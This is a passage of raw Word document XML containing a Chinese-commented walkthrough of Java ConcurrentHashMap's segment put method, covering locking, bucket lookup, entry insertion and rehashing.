            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>的锁，那么</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>node</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>为</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>null</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>，待会自己分配就好了</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                scanAndLockForPut(key, hash, value);  //</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>如果没有加上锁，那么等吧，有可能的话还要分配</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>entry</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>，反正有时间干嘛不多做一些事情</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>            V oldValue;</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>            try {</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>             //</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>这里表示已经获取了锁，那么将在相应的位置放入</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>entry</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                HashEntry&lt;K,V&gt;[] tab = table;</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                int index = (tab.length - 1) &amp; hash;</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                HashEntry&lt;K,V&gt; first = entryAt(tab, index);  //</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>找到存放</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>entry</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>的桶，然后获取第一个</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>entry</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                for (HashEntry&lt;K,V&gt; e = first;;) {  //</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>从当前的第一个元素开始</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                    if (e != null) {</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                        K k;</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                        if ((k = e.key) == key ||</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                            (e.hash == hash &amp;&amp; key.equals(k))) {  //</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>如果</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>key</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>相等，那么直接替换元素</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                            oldValue = e.value;  </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                            if (!onlyIfAbsent) {</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                                e.value = value;   </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                                ++modCount;</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                            }</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                            break;</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                        }</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                        e = e.next;</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                    }</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                    else {</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                        if (node != null)</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                            node.setNext(first);</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                        else</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                            node = new HashEntry&lt;K,V&gt;(hash, key, value, first);</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                        int c = count + 1;</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                        if (c &gt; threshold &amp;&amp; tab.length &lt; MAXIMUM_CAPACITY)</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                         //</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>如果元素太多了，那么需要重新调整当前的</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>hash</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>结构，让桶变多一些，这样元素放的更离散一些</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                            rehash(node);</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                        else</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                            setEntryAt(tab, index, node);</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                        ++modCount;</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>                        count = c;</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                        oldValue = null;</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                        break;</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                    }</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                }</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>            } finally {</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                unlock();  //</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>这里必须要在</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>finally</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>里面释放已经获取的锁，这样才能保证锁一定会被释放</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>            }</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>            return oldValue;</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>        }</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="000F6072">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="000F6072">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="136" w:after="136"/>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 xml:space="preserve">　其实在这里</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
